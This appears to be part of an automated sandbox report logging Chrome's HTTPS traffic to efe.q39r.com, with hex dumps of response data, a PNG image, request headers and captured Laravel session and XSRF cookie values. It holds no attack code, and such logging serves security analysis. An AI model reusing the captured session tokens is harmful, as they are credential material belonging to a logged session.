                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08
                                                                                  Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10
                                                                                  Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20
                                                                                  Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                                                  Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                                                  Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                                                                                  Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                                                  Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                                                  Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                                                                                  Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  65192.168.2.1749781172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:36 UTC1144OUTGET /opDozZ86DfeH93KodasaV6JoKAz0XdnqsnPjlpZlIO7stX2Hqwxgyu5mt9zG3Ft9LdS3Ohi89ehtoHb0ef232 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:36 UTC679INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:36 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 29796
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="opDozZ86DfeH93KodasaV6JoKAz0XdnqsnPjlpZlIO7stX2Hqwxgyu5mt9zG3Ft9LdS3Ohi89ehtoHb0ef232"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f8f1ACQwxWERZkgzhqYpNVWWb%2FMjF64g3aP5eseAC1xytzDaCl6b2b19lxn749LSe%2BGvOCi4p7y5Yum2BmuoKyNfAKyq6koUjFidGkNYn%2F5JXFvGZXDrVtGetkLVdg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fadb51f4e1f9d-ATL
                                                                                  2024-04-25 16:23:36 UTC690INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 fa 00 00 01 2f 08 06 00 00 00 ad e6 03 d5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ec 5d 07 58 53 49 17 3d 88 20 4d b0 80 14 11 54 b0 60 03 b1 8b 58 10 c5 de c5 82 bd ae 7d 7f 5d fb ae 7d ed ab ae ae ae 65 d7 ae 6b ef 1d 7b af 28 2a 56 ec a2 a0 82 82 60 a1 f8 fe 6f 26 10 13 29 69 2f c9 cb cb cc f7 c5 48 32 73 e7 de 73 ef 9b 93 79 6f e6 8e 09 58 61 08 30 04 18 02 0c 01 86 00 43 40 b4 08 98 88 d6 32 66 18 43 80 21 c0 10 60 08 30 04 18 02 60 44 cf 82 80 21 c0 10 60 08 30 04 18 02 22 46 80 11 bd 88 9d cb 4c 63 08 30 04 18 02 0c 01 86 00 23 7a 03 8b 81 b0 1b e1 dc a1 83 07 10 15 15 85 d7 af 5e e1 d5 ab 57 f8 f6 ed 1b 0a 17 76 45 61 d7 c2 28 52 c4 0d d5 ab 57 87 6f a5 4a c8 6b
                                                                                  Data Ascii: PNGIHDR/sRGB IDATx^]XSI= MT`X}]}ek{(*V`o&)i/H2ssyoXa0C@2fC!`0`D!`0"FLc0#z^WvEa(RWoJk
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: a9 9c 21 43 87 22 29 29 09 4f 9f 3e 45 fc 87 0f 39 ca cf 97 2f 3f 8a 16 2b 86 62 c5 8a a1 48 91 22 70 2d 52 04 4e 85 1c 58 ec 68 ec 15 26 80 21 c0 10 60 08 68 1f 01 36 58 f3 80 f1 b0 9f 7f e6 8e 86 86 f2 20 e9 bb 08 33 33 73 0c 1d 3b 59 a9 e7 f1 39 75 1c 11 1e 86 63 07 77 23 ee dd 5b 5e f5 73 75 75 85 9b bb 3b 25 fe 0a de de a8 57 2f 00 76 79 6d 58 3c f1 8a 32 13 c6 10 60 08 30 04 34 47 80 0d cc 1a 62 78 f7 fe 03 ae 43 fb 76 72 2b dc 35 14 49 9b 07 b5 68 87 1a b5 03 d4 12 95 92 9c 8c f0 b0 cb 38 7f 22 14 71 b1 fc 12 7c 76 0a 11 e2 af 5b 2f 00 f5 ea d5 43 f5 6a 55 59 5c a9 e5 39 d6 88 21 c0 10 60 08 f0 8f 00 1b 90 35 c4 74 c9 df 4b b9 c5 7f 2d a2 52 1a 34 68 88 05 0b e6 ab 85 69 f8 cd 5b 5c e7 4e 1d a9 9c 3c 79 2c 30 6a ca 6c 95 9f cb 47 bf 7a 89 db 37 ae
                                                                                  Data Ascii: !C"))O>E9/?+bH"p-RNXh&!`h6X 33s;Y9ucw#[^suu;%W/vymX<2`04GbxCvr+5Ih8"q|v[/CjUY\9!`5tK-R4hi[\N<y,0jlGz7
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: 20 50 c3 bb 33 67 ce e2 d6 ad 93 9c 2c 17 dc a1 23 26 4e f8 4d 63 1c 97 2e 5b c6 2d 5a b8 90 ca ac 59 27 10 0d 9b b7 c1 97 2f 5f b0 7c fe 0c b9 a4 37 e4 73 f2 bd 21 97 07 77 6e 61 d7 e6 75 72 cf ee 27 4e 9a 84 60 0d ef 8a 30 a2 37 e4 a8 60 ba f3 81 00 23 7a 3e 50 14 9f 0c 8d 09 4a 7c 90 e4 6c d1 87 84 04 2e b8 5d 7b 44 45 49 16 ce ad f8 f7 5f d4 ac 5e 5d 63 1c 65 ef 12 90 63 68 eb 37 6d 85 3d 9b d7 49 67 be a4 af 36 9d 7b a0 82 6f 55 51 40 4e f6 df ef da bc 56 2e 35 ef 88 5f 46 a2 57 cf 1e 6a 63 c9 88 5e 14 a1 c1 8c d0 00 01 46 f4 1a 80 27 e2 a6 6a 0f aa 22 c6 24 47 d3 76 ec da c5 fd 36 7e 3c ad 43 72 bc ff b7 71 23 2f 18 7e 4c fa c4 05 b7 6b 87 e7 cf b3 4e f0 d2 ad ff 30 14 2f 51 4a 54 b0 bf 89 7e 85 5d 9b d6 e2 d5 cb e7 52 bb 7e 1a 30 00 43 06 0f 56 0b
                                                                                  Data Ascii: P3g,#&NMc.[-ZY'/_|7s!wnaur'N`07`#z>PJ|l.]{DEI_^]cech7m=Ig6{oUQ@NV.5_FWjc^F'j"$Gv6~<Crq#/~LkN0/QJT~]R~0CV
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: 22 65 f7 d3 a7 98 7d e3 26 a2 92 92 e8 df e5 0b 14 c0 af be 15 51 cd b1 90 b4 ce da 07 0f 31 e1 8a e4 ee 0f 29 25 ed ec f0 6b 25 5f d4 76 76 92 7e b6 f2 de 7d 4c b9 16 26 fd db df d9 09 fe 4e 4e 70 b0 b4 14 dc a5 15 fb e5 0b 8e 45 bd c2 85 98 18 c1 e9 66 2c 0a 31 a2 37 16 4f 6b cf 4e b5 06 54 ed a9 23 2c c9 b1 ef 3f d0 45 78 b1 b1 b1 54 b1 35 6b d7 a1 72 25 5f 8d 31 cb 6a 36 1f 79 ef 0e ce 1c 3b 48 fb a9 1b d4 0c 7e 75 1b 08 0b 0c 9e b5 89 79 fd 8a ce e2 6f 86 5d 96 93 3c 6a f4 18 74 ef d6 55 2d 8c f9 24 fa 62 79 f3 e2 44 8b 66 99 ac 0e da 7f 00 f7 3f c4 d3 cf 03 0a bb 60 65 dd 3a 72 75 e2 be 7e 85 ef 36 c9 e2 4a 52 c8 6c 7e 4d bd ba 99 e4 14 dd f0 9f f4 b3 21 e5 ca 62 84 77 05 9e 11 e6 4f 5c e8 cb 28 f4 3d 25 39 42 99 15 dd 23 c0 88 5e f7 98 8b ad 47 b5
                                                                                  Data Ascii: "e}&Q1)%k%_vv~}L&NNpEf,17OkNT#,?ExT5kr%_1j6y;H~uyo]<jtU-$byDf?`e:ru~6JRl~M!bwO\(=%9B#^G
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: 30 28 08 f3 e7 cd e3 05 a3 9b b7 23 b8 4e e9 ab f8 89 6c 5b bb 7c 68 d2 ba 03 4a 97 f3 96 53 e0 e1 dd db d8 b7 7d 13 e2 3f c4 a1 aa 5f 1d d4 6f d2 12 79 f2 e4 4c 94 fa f2 61 c2 87 f7 94 e0 2f 9f 3b 25 a7 42 ed 6a ae e8 d5 a1 1c 7c cb 4b d6 1f 28 53 4c 5d 46 69 8c 33 23 7a 65 90 66 75 0c 0d 01 46 f4 86 e6 31 e1 e9 ab f1 e0 2a 3c 93 34 d3 28 b8 43 07 2e e2 f6 6d 2a 64 f6 9c b9 68 da a4 31 2f 18 ed 3b 70 80 1b 3d 72 24 95 6b 97 af 00 06 8f 9e 00 33 33 c9 82 34 52 c8 ed ee fd db ff c3 bd 88 9b 70 72 71 45 ab 8e dd e8 bb 50 cb 95 f3 a7 41 56 d4 7f 88 93 64 0d 24 85 2c b6 1b da cb 97 92 bc aa e5 ab 6d 67 58 d9 b8 6a 84 35 23 7a 55 51 67 f5 0d 01 01 46 f4 86 e0 25 61 eb a8 d1 c0 2a 6c d3 54 d7 ee ec f9 f3 5c ff be 7d 69 43 37 37 37 1c 3c 78 90 37 7c d6 ac 5b c7
                                                                                  Data Ascii: 0(#Nl[|hJS}?_oyLa/;%Bj|K(SL]Fi3#zefuF1*<4(C.m*dh1/;p=r$k334RprqEPAVd$,mgXj5#zUQgF%a*lT\}iC777<x7|[
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: 82 9c b7 ca 4e 56 96 b0 33 37 47 5e 33 73 e4 ce 65 02 8e 03 d2 38 0e 09 c9 c9 88 4f 4e 46 cc e7 cf bc f5 65 8c 82 18 d1 1b a3 d7 f9 b5 59 a3 81 95 5f 55 f4 23 ed c0 c1 43 dc c8 5f 46 d0 ce bd 7d 7c b0 71 c3 06 ad 60 22 7b eb be a8 47 09 3c 7d f4 10 ae 6e 45 d1 ac 5d e7 4c 89 71 48 32 1a 72 9b fe cb 97 cf 08 6c da 0a b5 ea 35 94 03 87 1c 1c 43 d2 e3 92 ef 34 c9 9a 77 eb fa 15 7a 9b 9e 6c ef cb 28 24 5d 2d 21 78 b2 a0 4e 95 72 e4 f4 53 fc 32 55 92 21 cf b7 9c 23 56 cf 6f a4 4a 73 a4 58 d5 86 45 be ea 1a 61 cf 88 5e 25 c8 d5 aa ec 69 67 0b ef 82 05 e1 95 2f 1f 4a d8 d9 c1 c3 ce 16 2e 56 56 c8 65 92 b5 eb 52 39 0e af 92 92 f0 28 21 01 0f e3 13 70 f7 fd 7b 84 c7 c6 e1 71 fa 09 8e 6a 29 61 64 8d 18 d1 1b 99 c3 b5 60 ae 46 03 ab 16 f4 d1 b9 c8 a1 c3 86 71 c7 8e
                                                                                  Data Ascii: NV37G^3se8ONFeY_U#C_F}|q`"{G<}nE]LqH2rl5C4wzl($]-!xNrS2U!#VoJsXEa^%ig/J.VVeR9(!p{qj)ad`Fq
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: 27 24 66 68 78 f7 fd 07 fc 7b ef 1e b6 3d fe fe b8 49 3d 0b 0d bb 15 23 7a c3 f6 9f 10 b4 d7 78 70 15 82 11 aa ea 10 fd e6 2d 17 18 50 0f 64 d6 4b ca 96 ad db 50 b6 8c 97 56 b1 b8 7e 23 9c eb 12 d2 99 f6 67 69 69 85 d1 53 e7 ca a9 1d 11 7e 8d 3e 8b 27 04 5e a3 4e 7d 04 34 6a 2e 97 03 9f 24 cc d9 b7 7d a3 e4 56 7f 31 4f 34 6b d7 29 53 0a 5d 52 87 6c bb 23 8b fa 64 4b 5e 1b 73 7c 4c 4c a6 1f 91 5b f5 3b ff 69 a9 2a 64 99 ea 93 85 77 13 e6 9e c3 f9 ab 92 0c 7a 65 4b 16 c4 da 3f 9b c0 2c 77 2e 95 64 a7 99 97 82 b9 7d 4b 5e b0 67 44 af 12 f4 74 cf fb 80 32 65 30 a0 6c 19 8d 57 d2 ab d6 b3 f2 b5 c9 b3 fb bf 23 ee 60 c5 dd 7b ca 37 12 59 4d 46 f4 22 73 a8 1e cc e1 65 80 d5 83 de 1a 75 f9 df a6 cd dc b4 a9 53 a8 8c 7a f5 02 f0 d7 5f 8b 74 82 43 fd c0 40 2e fa f5
                                                                                  Data Ascii: '$fhx{=I=#zxp-PdKPV~#giiS~>'^N}4j.$}V1O4k)S]Rl#dK^s|LL[;i*dwzeK?,w.d}K^gDt2e0lW#`{7YMF"seuSz_tC@.
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: db dd cc cc 0c 26 b9 72 a1 6e 83 a6 a8 5e 3b 00 b9 72 c9 6f 4f 23 5b e5 c8 6a fa d8 b7 92 63 74 49 29 ea 56 08 bd 82 4b a0 55 90 a7 90 e1 ce 52 37 6d dc b2 cf e8 88 11 7d f6 e1 40 08 9e 10 3d df 25 39 25 05 4f a3 62 f0 fa 4d 1c 3e 26 7d 42 4a 4a 2a f2 da 58 c1 3e bf 2d 8a 16 76 42 3e 5b 1b be bb a4 f2 12 53 52 30 fa e2 65 ec 7f fe 5c 2b f2 85 24 94 11 bd 90 bc 61 98 ba e8 9c e8 f4 05 d3 83 c8 48 ae 75 4b c9 fe f1 bc 79 6d b1 6d c7 0e b8 ba 38 eb c5 fe b9 7f fc c1 ad 5a b9 92 ea 62 63 6b 87 fe 3f 8f a1 09 72 64 0b 49 76 43 9e c3 df 8f b8 29 f7 39 59 57 d0 ad 5b 77 38 98 1e 43 ae 54 c3 7a 4e c9 99 58 22 d9 ae 0b ac ac f2 6b 05 77 46 f4 59 5f 5d 2e d6 56 f8 d3 af 26 aa 38 f0 7b e7 e7 65 f4 5b 5c bb fd 00 29 a9 69 d9 5e d6 c5 5c 9d e0 5b b6 24 34 38 4a 21 5b
                                                                                  Data Ascii: &rn^;roO#[jctI)VKUR7m}@=%9%ObM>&}BJJ*X>-vB>[SR0e\+$aHuKymm8Zbck?rdIvC)9YW[w8CTzNX"kwFY_].V&8{e[\)i^\[$48J![
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: db b7 6d a3 dd f4 ec d5 1b bf 8c 18 2e 6a 7b b3 c3 33 e9 f3 67 ce 34 f9 1e 4c 93 1f 22 57 ca 53 5e 60 27 47 cc a6 99 97 40 9a 79 69 58 5b d9 09 02 57 46 f4 df 5d 5b b5 50 21 6c 69 50 9f 17 5f ff 28 e4 c0 c9 4b f8 f4 e5 fb 09 88 ca 76 e2 5f a5 3c 1c 0b 66 7f b6 82 b2 72 b2 aa 47 96 0c 04 ed 3f 80 07 1f c4 97 ff 9e 11 bd 26 91 c1 da 12 04 04 31 40 6b c3 15 09 89 49 5c ed 5a 7e 48 49 91 64 cd 5a b7 7e 03 7c 2b fa 88 d6 5e 65 31 fc f4 29 9e cb 95 f2 82 66 d5 33 49 7b 83 5c a9 af 15 37 35 31 05 97 2b 3f be e5 76 c2 b7 dc ce f8 96 bb 08 ac ac ed 05 87 25 23 fa ef ae 0c f6 28 8e d9 d5 ab 29 f6 ad 1a 35 ce 85 45 e0 f5 1b d5 b7 73 b6 ac 5f 13 66 66 b9 d5 e8 51 b9 26 7d 4f 9d 41 e8 cb 97 ca 55 36 a0 5a 8c e8 0d c8 59 02 55 55 70 83 35 5f 38 6d dd be 9d 9b 34 61 02
                                                                                  Data Ascii: m.j{3g4L"WS^`'G@yiX[WF][P!liP_(Kv_<frG?&1@kI\Z~HIdZ~|+^e1)f3I{\751+?v%#()5Es_ffQ&}OAU6ZYUUp5_8m4a
                                                                                  2024-04-25 16:23:36 UTC474INData Raw: fe a8 e0 5b 15 6e c5 24 7b 74 93 93 bf e2 f1 83 7b 08 bb 7c 1e 0f ee dc 92 d6 f3 f6 f1 c1 46 b6 c5 4e 1c d1 aa c0 0a 46 f4 f2 00 cd aa 5e 15 1d 3c 54 df c3 be f7 f8 05 de 9e c7 ab 12 78 7e be 65 e1 5c a8 a0 2a 4d a4 75 ff bd 77 1f 53 af 85 a9 d5 56 e8 8d 18 d1 0b dd 43 c2 d7 cf 20 88 be 73 e7 10 2e 3c 5c 92 c3 da 2e 5f 7e b4 e9 dc 03 ee c5 b3 5f 51 7c ed e2 59 ec dd b6 51 8a 7e a7 ce 21 f8 75 fc 38 83 b0 55 f8 21 23 5c 0d 19 d1 cb fb 46 9d 13 ec 94 d9 1b af ad 08 28 e3 e9 0e f2 52 a7 90 8c 78 24 33 9e 18 0b 23 7a 31 7a 55 b7 36 09 9e fc 36 6d d9 c2 4d 9d 3c 99 a2 62 6a 6a 8a 3e 43 46 c2 d9 d5 4d 21 4a 61 97 ce 61 cf d6 0d d2 7a 5b b6 6e 43 d9 32 5e 82 b7 57 a1 61 ac 42 b6 08 30 a2 97 87 c6 3d af 0d 36 05 d6 87 b3 95 f2 e9 67 95 c9 76 a7 ad 10 54 37 b9 4e
                                                                                  Data Ascii: [n${t{|FNF^<Tx~e\*MuwSVC s.<\._~_Q|YQ~!u8U!#\F(Rx$3#z1zU66mM<bjj>CFM!Jaaz[nC2^WaB0=6gvT7N


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  66192.168.2.1749782172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
